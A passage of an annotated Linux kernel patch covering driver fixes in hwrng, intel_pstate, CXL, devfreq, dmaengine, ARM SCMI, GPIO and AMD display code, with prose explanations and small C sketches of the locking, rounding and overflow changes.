+ static void add_early_randomness(struct hwrng *rng)
+@@ -211,6 +214,7 @@ static inline int rng_get_data(struct hwrng *rng, u8 *buffer, size_t size,
+ static ssize_t rng_dev_read(struct file *filp, char __user *buf,
+ 			    size_t size, loff_t *offp)
+ {
++	u8 buffer[RNG_BUFFER_SIZE];
+ 	ssize_t ret = 0;
+ 	int err = 0;
+ 	int bytes_read, len;
+@@ -238,34 +242,37 @@ static ssize_t rng_dev_read(struct file *filp, char __user *buf,
+ 			if (bytes_read < 0) {
+ 				err = bytes_read;
+ 				goto out_unlock_reading;
++			} else if (bytes_read == 0 &&
++				   (filp->f_flags & O_NONBLOCK)) {
++				err = -EAGAIN;
++				goto out_unlock_reading;
+ 			}
++
+ 			data_avail = bytes_read;
+ 		}
+ 
+-		if (!data_avail) {
+-			if (filp->f_flags & O_NONBLOCK) {
+-				err = -EAGAIN;
+-				goto out_unlock_reading;
+-			}
+-		} else {
+-			len = data_avail;
++		len = data_avail;
++		if (len) {
+ 			if (len > size)
+ 				len = size;
+ 
+ 			data_avail -= len;
+ 
+-			if (copy_to_user(buf + ret, rng_buffer + data_avail,
+-								len)) {
++			memcpy(buffer, rng_buffer + data_avail, len);
++		}
++		mutex_unlock(&reading_mutex);
++		put_rng(rng);
++
++		if (len) {
++			if (copy_to_user(buf + ret, buffer, len)) {
+ 				err = -EFAULT;
+-				goto out_unlock_reading;
++				goto out;
+ 			}
+ 
+ 			size -= len;
+ 			ret += len;
+ 		}
+ 
+-		mutex_unlock(&reading_mutex);
+-		put_rng(rng);
+ 
+ 		if (need_resched())
+ 			schedule_timeout_interruptible(1);
+@@ -276,6 +283,7 @@ static ssize_t rng_dev_read(struct file *filp, char __user *buf,
+ 		}
+ 	}
+ out:
++	memzero_explicit(buffer, sizeof(buffer));
+ 	return ret ? : err;
+ 
+ out_unlock_reading:
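The hwrng read path now snapshots the sample into an on-stack RNG_BUFFER_SIZE bounce buffer, releases reading_mutex and the rng reference, and only then calls copy_to_user(); faulting in the user page can block for arbitrarily long, and doing that under the mutex could starve every other reader. memzero_explicit() scrubs the stack copy on the way out. A pthread sketch of the reordering:

#include <pthread.h>
#include <stdio.h>
#include <string.h>

#define RNG_BUFFER_SIZE 32

static pthread_mutex_t reading_mutex = PTHREAD_MUTEX_INITIALIZER;
static unsigned char rng_buffer[RNG_BUFFER_SIZE];  /* shared, lock-protected */

/* Stand-in for copy_to_user(), which may block indefinitely on a fault. */
static int slow_copy_out(void *dst, const void *src, size_t len)
{
	memcpy(dst, src, len);
	return 0;
}

/* Pattern from the hunk: snapshot under the lock, drop the lock, then do
 * the potentially blocking copy, then scrub the stack copy. */
static int read_sample(void *dst, size_t len)
{
	unsigned char buffer[RNG_BUFFER_SIZE];
	int err;

	pthread_mutex_lock(&reading_mutex);
	memcpy(buffer, rng_buffer, len);
	pthread_mutex_unlock(&reading_mutex);

	err = slow_copy_out(dst, buffer, len);

	/* The kernel uses memzero_explicit(): a plain memset here could
	 * legally be optimized away. */
	memset(buffer, 0, sizeof(buffer));
	return err;
}

int main(void)
{
	unsigned char out[8];

	printf("read: %d\n", read_sample(out, sizeof(out)));
	return 0;
}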
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index fbe3a40987438..abdd26f7d04c9 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -493,6 +493,30 @@ static inline int intel_pstate_get_cppc_guaranteed(int cpu)
+ }
+ #endif /* CONFIG_ACPI_CPPC_LIB */
+ 
++static int intel_pstate_freq_to_hwp_rel(struct cpudata *cpu, int freq,
++					unsigned int relation)
++{
++	if (freq == cpu->pstate.turbo_freq)
++		return cpu->pstate.turbo_pstate;
++
++	if (freq == cpu->pstate.max_freq)
++		return cpu->pstate.max_pstate;
++
++	switch (relation) {
++	case CPUFREQ_RELATION_H:
++		return freq / cpu->pstate.scaling;
++	case CPUFREQ_RELATION_C:
++		return DIV_ROUND_CLOSEST(freq, cpu->pstate.scaling);
++	}
++
++	return DIV_ROUND_UP(freq, cpu->pstate.scaling);
++}
++
++static int intel_pstate_freq_to_hwp(struct cpudata *cpu, int freq)
++{
++	return intel_pstate_freq_to_hwp_rel(cpu, freq, CPUFREQ_RELATION_L);
++}
++
+ /**
+  * intel_pstate_hybrid_hwp_adjust - Calibrate HWP performance levels.
+  * @cpu: Target CPU.
+@@ -510,6 +534,7 @@ static void intel_pstate_hybrid_hwp_adjust(struct cpudata *cpu)
+ 	int perf_ctl_scaling = cpu->pstate.perf_ctl_scaling;
+ 	int perf_ctl_turbo = pstate_funcs.get_turbo(cpu->cpu);
+ 	int scaling = cpu->pstate.scaling;
++	int freq;
+ 
+ 	pr_debug("CPU%d: perf_ctl_max_phys = %d\n", cpu->cpu, perf_ctl_max_phys);
+ 	pr_debug("CPU%d: perf_ctl_turbo = %d\n", cpu->cpu, perf_ctl_turbo);
+@@ -523,16 +548,16 @@ static void intel_pstate_hybrid_hwp_adjust(struct cpudata *cpu)
+ 	cpu->pstate.max_freq = rounddown(cpu->pstate.max_pstate * scaling,
+ 					 perf_ctl_scaling);
+ 
+-	cpu->pstate.max_pstate_physical =
+-			DIV_ROUND_UP(perf_ctl_max_phys * perf_ctl_scaling,
+-				     scaling);
++	freq = perf_ctl_max_phys * perf_ctl_scaling;
++	cpu->pstate.max_pstate_physical = intel_pstate_freq_to_hwp(cpu, freq);
+ 
+-	cpu->pstate.min_freq = cpu->pstate.min_pstate * perf_ctl_scaling;
++	freq = cpu->pstate.min_pstate * perf_ctl_scaling;
++	cpu->pstate.min_freq = freq;
+ 	/*
+ 	 * Cast the min P-state value retrieved via pstate_funcs.get_min() to
+ 	 * the effective range of HWP performance levels.
+ 	 */
+-	cpu->pstate.min_pstate = DIV_ROUND_UP(cpu->pstate.min_freq, scaling);
++	cpu->pstate.min_pstate = intel_pstate_freq_to_hwp(cpu, freq);
+ }
+ 
+ static inline void update_turbo_state(void)
+@@ -2493,13 +2518,12 @@ static void intel_pstate_update_perf_limits(struct cpudata *cpu,
+ 	 * abstract values to represent performance rather than pure ratios.
+ 	 */
+ 	if (hwp_active && cpu->pstate.scaling != perf_ctl_scaling) {
+-		int scaling = cpu->pstate.scaling;
+ 		int freq;
+ 
+ 		freq = max_policy_perf * perf_ctl_scaling;
+-		max_policy_perf = DIV_ROUND_UP(freq, scaling);
++		max_policy_perf = intel_pstate_freq_to_hwp(cpu, freq);
+ 		freq = min_policy_perf * perf_ctl_scaling;
+-		min_policy_perf = DIV_ROUND_UP(freq, scaling);
++		min_policy_perf = intel_pstate_freq_to_hwp(cpu, freq);
+ 	}
+ 
+ 	pr_debug("cpu:%d min_policy_perf:%d max_policy_perf:%d\n",
+@@ -2873,18 +2897,7 @@ static int intel_cpufreq_target(struct cpufreq_policy *policy,
+ 
+ 	cpufreq_freq_transition_begin(policy, &freqs);
+ 
+-	switch (relation) {
+-	case CPUFREQ_RELATION_L:
+-		target_pstate = DIV_ROUND_UP(freqs.new, cpu->pstate.scaling);
+-		break;
+-	case CPUFREQ_RELATION_H:
+-		target_pstate = freqs.new / cpu->pstate.scaling;
+-		break;
+-	default:
+-		target_pstate = DIV_ROUND_CLOSEST(freqs.new, cpu->pstate.scaling);
+-		break;
+-	}
+-
++	target_pstate = intel_pstate_freq_to_hwp_rel(cpu, freqs.new, relation);
+ 	target_pstate = intel_cpufreq_update_pstate(policy, target_pstate, false);
+ 
+ 	freqs.new = target_pstate * cpu->pstate.scaling;
+@@ -2902,7 +2915,7 @@ static unsigned int intel_cpufreq_fast_switch(struct cpufreq_policy *policy,
+ 
+ 	update_turbo_state();
+ 
+-	target_pstate = DIV_ROUND_UP(target_freq, cpu->pstate.scaling);
++	target_pstate = intel_pstate_freq_to_hwp(cpu, target_freq);
+ 
+ 	target_pstate = intel_cpufreq_update_pstate(policy, target_pstate, true);
+ 
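The three open-coded divisions collapse into intel_pstate_freq_to_hwp_rel(), which also short-circuits exact turbo/max frequencies so rounding can never undershoot them: CPUFREQ_RELATION_H rounds down, _C rounds to nearest, and the default (_L) rounds up. A worked example with an assumed 100000 kHz scaling step:

#include <stdio.h>

#define DIV_ROUND_UP(n, d)	(((n) + (d) - 1) / (d))
#define DIV_ROUND_CLOSEST(n, d)	(((n) + (d) / 2) / (d))

int main(void)
{
	int scaling = 100000;	/* kHz per P-state step, assumed */
	int freq = 2350000;	/* requested 2.35 GHz */

	printf("H (floor):   %d\n", freq / scaling);                  /* 23 */
	printf("C (nearest): %d\n", DIV_ROUND_CLOSEST(freq, scaling)); /* 24 */
	printf("L (ceil):    %d\n", DIV_ROUND_UP(freq, scaling));      /* 24 */
	return 0;
}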
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index 2f7187dbfa2d9..5b7d848a6f01b 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -450,7 +450,7 @@ static int alloc_hpa(struct cxl_region *cxlr, resource_size_t size)
+ 	struct cxl_root_decoder *cxlrd = to_cxl_root_decoder(cxlr->dev.parent);
+ 	struct cxl_region_params *p = &cxlr->params;
+ 	struct resource *res;
+-	u32 remainder = 0;
++	u64 remainder = 0;
+ 
+ 	lockdep_assert_held_write(&cxl_region_rwsem);
+ 
+@@ -470,7 +470,7 @@ static int alloc_hpa(struct cxl_region *cxlr, resource_size_t size)
+ 	    (cxlr->mode == CXL_DECODER_PMEM && uuid_is_null(&p->uuid)))
+ 		return -ENXIO;
+ 
+-	div_u64_rem(size, SZ_256M * p->interleave_ways, &remainder);
++	div64_u64_rem(size, (u64)SZ_256M * p->interleave_ways, &remainder);
+ 	if (remainder)
+ 		return -EINVAL;
+ 
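div_u64_rem() takes a 32-bit divisor and remainder, but SZ_256M * interleave_ways hits 2^32 exactly at 16 ways, so the old alignment check handed the helper a wrapped divisor. div64_u64_rem() keeps the arithmetic in 64 bits. The overflow in isolation:

#include <stdint.h>
#include <stdio.h>

#define SZ_256M 0x10000000U

int main(void)
{
	unsigned int ways = 16;

	uint32_t bad  = SZ_256M * ways;           /* wraps to 0 in 32 bits */
	uint64_t good = (uint64_t)SZ_256M * ways; /* 0x100000000 */

	printf("32-bit: %#x, 64-bit: %#llx\n", bad, (unsigned long long)good);
	return 0;
}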
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index fe6644f998872..2951a87ccb979 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -1687,7 +1687,7 @@ static ssize_t trans_stat_show(struct device *dev,
+ 			       struct device_attribute *attr, char *buf)
+ {
+ 	struct devfreq *df = to_devfreq(dev);
+-	ssize_t len;
++	ssize_t len = 0;
+ 	int i, j;
+ 	unsigned int max_state;
+ 
+@@ -1696,7 +1696,7 @@ static ssize_t trans_stat_show(struct device *dev,
+ 	max_state = df->max_state;
+ 
+ 	if (max_state == 0)
+-		return sprintf(buf, "Not Supported.\n");
++		return scnprintf(buf, PAGE_SIZE, "Not Supported.\n");
+ 
+ 	mutex_lock(&df->lock);
+ 	if (!df->stop_polling &&
+@@ -1706,31 +1706,52 @@ static ssize_t trans_stat_show(struct device *dev,
+ 	}
+ 	mutex_unlock(&df->lock);
+ 
+-	len = sprintf(buf, "     From  :   To\n");
+-	len += sprintf(buf + len, "           :");
+-	for (i = 0; i < max_state; i++)
+-		len += sprintf(buf + len, "%10lu",
+-				df->freq_table[i]);
++	len += scnprintf(buf + len, PAGE_SIZE - len, "     From  :   To\n");
++	len += scnprintf(buf + len, PAGE_SIZE - len, "           :");
++	for (i = 0; i < max_state; i++) {
++		if (len >= PAGE_SIZE - 1)
++			break;
++		len += scnprintf(buf + len, PAGE_SIZE - len, "%10lu",
++				 df->freq_table[i]);
++	}
++	if (len >= PAGE_SIZE - 1)
++		return PAGE_SIZE - 1;
+ 
+-	len += sprintf(buf + len, "   time(ms)\n");
++	len += scnprintf(buf + len, PAGE_SIZE - len, "   time(ms)\n");
+ 
+ 	for (i = 0; i < max_state; i++) {
++		if (len >= PAGE_SIZE - 1)
++			break;
+ 		if (df->freq_table[i] == df->previous_freq)
+-			len += sprintf(buf + len, "*");
++			len += scnprintf(buf + len, PAGE_SIZE - len, "*");
+ 		else
+-			len += sprintf(buf + len, " ");
++			len += scnprintf(buf + len, PAGE_SIZE - len, " ");
++		if (len >= PAGE_SIZE - 1)
++			break;
++
++		len += scnprintf(buf + len, PAGE_SIZE - len, "%10lu:",
++				 df->freq_table[i]);
++		for (j = 0; j < max_state; j++) {
++			if (len >= PAGE_SIZE - 1)
++				break;
++			len += scnprintf(buf + len, PAGE_SIZE - len, "%10u",
++					 df->stats.trans_table[(i * max_state) + j]);
++		}
++		if (len >= PAGE_SIZE - 1)
++			break;
++		len += scnprintf(buf + len, PAGE_SIZE - len, "%10llu\n", (u64)
++				 jiffies64_to_msecs(df->stats.time_in_state[i]));
++	}
+ 
+-		len += sprintf(buf + len, "%10lu:", df->freq_table[i]);
+-		for (j = 0; j < max_state; j++)
+-			len += sprintf(buf + len, "%10u",
+-				df->stats.trans_table[(i * max_state) + j]);
++	if (len < PAGE_SIZE - 1)
++		len += scnprintf(buf + len, PAGE_SIZE - len, "Total transition : %u\n",
++				 df->stats.total_trans);
+ 
+-		len += sprintf(buf + len, "%10llu\n", (u64)
+-			jiffies64_to_msecs(df->stats.time_in_state[i]));
++	if (len >= PAGE_SIZE - 1) {
++		pr_warn_once("devfreq transition table exceeds PAGE_SIZE. Disabling\n");
++		return -EFBIG;
+ 	}
+ 
+-	len += sprintf(buf + len, "Total transition : %u\n",
+-					df->stats.total_trans);
+ 	return len;
+ }
+ 
+diff --git a/drivers/dma/dmaengine.c b/drivers/dma/dmaengine.c
+index 8a6e6b60d66f3..892e8389232e7 100644
+--- a/drivers/dma/dmaengine.c
++++ b/drivers/dma/dmaengine.c
+@@ -1103,6 +1103,9 @@ EXPORT_SYMBOL_GPL(dma_async_device_channel_register);
+ static void __dma_async_device_channel_unregister(struct dma_device *device,
+ 						  struct dma_chan *chan)
+ {
++	if (chan->local == NULL)
++		return;
++
+ 	WARN_ONCE(!device->device_release && chan->client_count,
+ 		  "%s called while %d clients hold a reference\n",
+ 		  __func__, chan->client_count);
+diff --git a/drivers/firmware/arm_scmi/common.h b/drivers/firmware/arm_scmi/common.h
+index a1c0154c31c6f..4ac72754c2554 100644
+--- a/drivers/firmware/arm_scmi/common.h
++++ b/drivers/firmware/arm_scmi/common.h
+@@ -244,6 +244,7 @@ void shmem_fetch_notification(struct scmi_shared_mem __iomem *shmem,
+ void shmem_clear_channel(struct scmi_shared_mem __iomem *shmem);
+ bool shmem_poll_done(struct scmi_shared_mem __iomem *shmem,
+ 		     struct scmi_xfer *xfer);
++bool shmem_channel_free(struct scmi_shared_mem __iomem *shmem);
+ 
+ /* declarations for message passing transports */
+ struct scmi_msg_payld;
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index 25d31dfdad15d..81c902672a305 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -43,6 +43,20 @@ static void rx_callback(struct mbox_client *cl, void *m)
+ {
+ 	struct scmi_mailbox *smbox = client_to_scmi_mailbox(cl);
+ 
++	/*
++	 * An A2P IRQ is NOT valid when received while the platform still has
++	 * the ownership of the channel, because the platform at first releases
++	 * the SMT channel and then sends the completion interrupt.
++	 *
++	 * This addresses a possible race condition in which a spurious IRQ from
++	 * a previous timed-out reply which arrived late could be wrongly
++	 * associated with the next pending transaction.
++	 */
++	if (cl->knows_txdone && !shmem_channel_free(smbox->shmem)) {
++		dev_warn(smbox->cinfo->dev, "Ignoring spurious A2P IRQ !\n");
++		return;
++	}
++
+ 	scmi_rx_callback(smbox->cinfo, shmem_read_header(smbox->shmem), NULL);
+ }
+ 
+diff --git a/drivers/firmware/arm_scmi/shmem.c b/drivers/firmware/arm_scmi/shmem.c
+index 87b4f4d35f062..517d52fb3bcbb 100644
+--- a/drivers/firmware/arm_scmi/shmem.c
++++ b/drivers/firmware/arm_scmi/shmem.c
+@@ -122,3 +122,9 @@ bool shmem_poll_done(struct scmi_shared_mem __iomem *shmem,
+ 		(SCMI_SHMEM_CHAN_STAT_CHANNEL_ERROR |
+ 		 SCMI_SHMEM_CHAN_STAT_CHANNEL_FREE);
+ }
++
++bool shmem_channel_free(struct scmi_shared_mem __iomem *shmem)
++{
++	return (ioread32(&shmem->channel_status) &
++			SCMI_SHMEM_CHAN_STAT_CHANNEL_FREE);
++}
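The mailbox guard relies on SMT channel ownership: the platform releases the shared-memory channel before raising the completion interrupt, so an A2P IRQ that arrives while the channel is still busy can only be a stale one from an earlier timed-out exchange, and matching it to the next pending transfer would corrupt that transaction. shmem_channel_free() just reads the status bit; the sketch below assumes the FREE flag sits in bit 0:

#include <stdint.h>
#include <stdio.h>

#define CHAN_STAT_FREE (1u << 0)	/* bit position assumed for the sketch */

static int channel_free(const volatile uint32_t *status)
{
	return *status & CHAN_STAT_FREE;
}

int main(void)
{
	volatile uint32_t status = 0;	/* platform still owns the channel */

	if (!channel_free(&status))
		puts("Ignoring spurious A2P IRQ !");
	return 0;
}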
+diff --git a/drivers/gpio/gpio-eic-sprd.c b/drivers/gpio/gpio-eic-sprd.c
+index 8d722e026e9c9..c2857ed0c78ab 100644
+--- a/drivers/gpio/gpio-eic-sprd.c
++++ b/drivers/gpio/gpio-eic-sprd.c
+@@ -318,20 +318,27 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 		switch (flow_type) {
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IEV, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IC, 1);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IEV, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IC, 1);
+ 			break;
+ 		case IRQ_TYPE_EDGE_RISING:
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			state = sprd_eic_get(chip, offset);
+-			if (state)
++			if (state) {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_DBNC_IEV, 0);
+-			else
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_DBNC_IC, 1);
++			} else {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_DBNC_IEV, 1);
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_DBNC_IC, 1);
++			}
+ 			break;
+ 		default:
+ 			return -ENOTSUPP;
+@@ -343,20 +350,27 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 		switch (flow_type) {
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTCLR, 1);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTCLR, 1);
+ 			break;
+ 		case IRQ_TYPE_EDGE_RISING:
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			state = sprd_eic_get(chip, offset);
+-			if (state)
++			if (state) {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_LATCH_INTPOL, 0);
+-			else
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_LATCH_INTCLR, 1);
++			} else {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_LATCH_INTPOL, 1);
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_LATCH_INTCLR, 1);
++			}
+ 			break;
+ 		default:
+ 			return -ENOTSUPP;
+@@ -370,29 +384,34 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		default:
+@@ -405,29 +424,34 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		default:
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index 787d47e667adb..33d73687e463d 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -1626,6 +1626,20 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_wake = "ELAN0415:00@9",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 0.35
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/3073
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "GPD"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "G1619-04"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "PNP0C50:00@8",
++		},
++	},
+ 	{} /* Terminating entry */
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index a8e1f2cfe12dc..b9983ca99eb7d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2202,8 +2202,6 @@ retry_init:
+ 
+ 		pci_wake_from_d3(pdev, TRUE);
+ 
+-		pci_wake_from_d3(pdev, TRUE);
+-
+ 		/*
+ 		 * For runpm implemented via BACO, PMFW will handle the
+ 		 * timing for BACO in and out:
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 13e0b521e3dba..f02e509d5facb 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6677,8 +6677,7 @@ static int dm_encoder_helper_atomic_check(struct drm_encoder *encoder,
+ 	if (IS_ERR(mst_state))
+ 		return PTR_ERR(mst_state);
+ 
+-	if (!mst_state->pbn_div)
+-		mst_state->pbn_div = dm_mst_get_pbn_divider(aconnector->mst_port->dc_link);
++	mst_state->pbn_div = dm_mst_get_pbn_divider(aconnector->mst_port->dc_link);
+ 
+ 	if (!state->duplicated) {
+ 		int max_bpc = conn_state->max_requested_bpc;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+index e43b4d7dc60e2..c8136a05a8d32 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+@@ -131,30 +131,27 @@ static int dcn314_get_active_display_cnt_wa(
+ 	return display_count;
+ }
+ 
+-static void dcn314_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context, bool disable)
++static void dcn314_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context,
++				  bool safe_to_lower, bool disable)
+ {
+ 	struct dc *dc = clk_mgr_base->ctx->dc;
+ 	int i;
+ 
+ 	for (i = 0; i < dc->res_pool->pipe_count; ++i) {
+-		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++		struct pipe_ctx *pipe = safe_to_lower
++			? &context->res_ctx.pipe_ctx[i]
++			: &dc->current_state->res_ctx.pipe_ctx[i];
+ 
+ 		if (pipe->top_pipe || pipe->prev_odm_pipe)
+ 			continue;
+ 		if (pipe->stream && (pipe->stream->dpms_off || dc_is_virtual_signal(pipe->stream->signal))) {
+-			struct stream_encoder *stream_enc = pipe->stream_res.stream_enc;
+-
+ 			if (disable) {
+-				if (stream_enc && stream_enc->funcs->disable_fifo)
+-					pipe->stream_res.stream_enc->funcs->disable_fifo(stream_enc);
++				if (pipe->stream_res.tg && pipe->stream_res.tg->funcs->immediate_disable_crtc)
++					pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
+ 
+-				pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
+ 				reset_sync_context_for_pipe(dc, context, i);
+ 			} else {
+ 				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
+-
+-				if (stream_enc && stream_enc->funcs->enable_fifo)
+-					pipe->stream_res.stream_enc->funcs->enable_fifo(stream_enc);
+ 			}
+ 		}
+ 	}
+@@ -254,11 +251,11 @@ void dcn314_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	}
+ 
+ 	if (should_set_clock(safe_to_lower, new_clocks->dispclk_khz, clk_mgr_base->clks.dispclk_khz)) {
+-		dcn314_disable_otg_wa(clk_mgr_base, context, true);
++		dcn314_disable_otg_wa(clk_mgr_base, context, safe_to_lower, true);
+ 
+ 		clk_mgr_base->clks.dispclk_khz = new_clocks->dispclk_khz;
+ 		dcn314_smu_set_dispclk(clk_mgr, clk_mgr_base->clks.dispclk_khz);
